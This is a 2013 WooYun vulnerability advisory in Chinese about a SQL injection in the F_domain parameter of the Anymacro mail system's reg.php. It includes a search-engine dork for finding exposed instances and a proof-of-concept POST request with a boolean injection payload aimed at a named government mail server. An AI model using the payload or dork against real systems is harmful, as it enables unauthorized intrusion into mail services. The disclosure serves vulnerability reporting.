当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038636

漏洞标题:安宁邮件系统(Anymacro)sqlinject漏洞

相关厂商:Anymacro

漏洞作者: 想要减肥的胖纸

提交时间:2013-10-01 00:24

修复时间:2013-12-30 00:25

公开时间:2013-12-30 00:25

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-01: 细节已通知厂商并且等待厂商处理中
2013-10-05: 厂商已经确认,细节仅向厂商公开
2013-10-08: 细节向第三方安全合作伙伴开放
2013-11-29: 细节向核心白帽子及相关领域专家公开
2013-12-09: 细节向普通白帽子公开
2013-12-19: 细节向实习白帽子公开
2013-12-30: 细节向公众公开

简要描述:

非之前登录框注入。危害范围很大,建议安宁厂商给所有各户老版本邮件系统升级到最新版本

详细说明:

/reg.php的F_domain参数存在sql注入

漏洞证明:

以下系统都有可能存在注入
http://203.208.46.145/#newwindow=1&q=inurl:reg.php%3FF_lang&start=10
poc

http://mail.sjz.gov.cn/reg.php
post:
F_chkcode_enc=mA4h8UuOqt0=&F_regpass=123&F_name=123321&F_email=112333&F_domain=sjz.gov.cn' AND 7955=7955 AND 'Ldun'='Ldun&F_password=123321&F_password2=123321&F_chkcode=233326&act=%D7%A2+%B2%E1


QQ20130930-1@2x.png


QQ20130930-2@2x.png


QQ20130930-5@2x.png


修复方案:

临时解决办法 删除reg.php

版权声明:转载请注明来源 想要减肥的胖纸@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-10-05 22:47

厂商回复:

暂无

最新状态:

2013-10-13:根据CNVD后续测试结果,在多个政府部门应用实例中,已经删除存在漏洞点的页面,只测得少数实例。已经在节后及时通知安宁邮件软件生产厂商——安宁公司处置。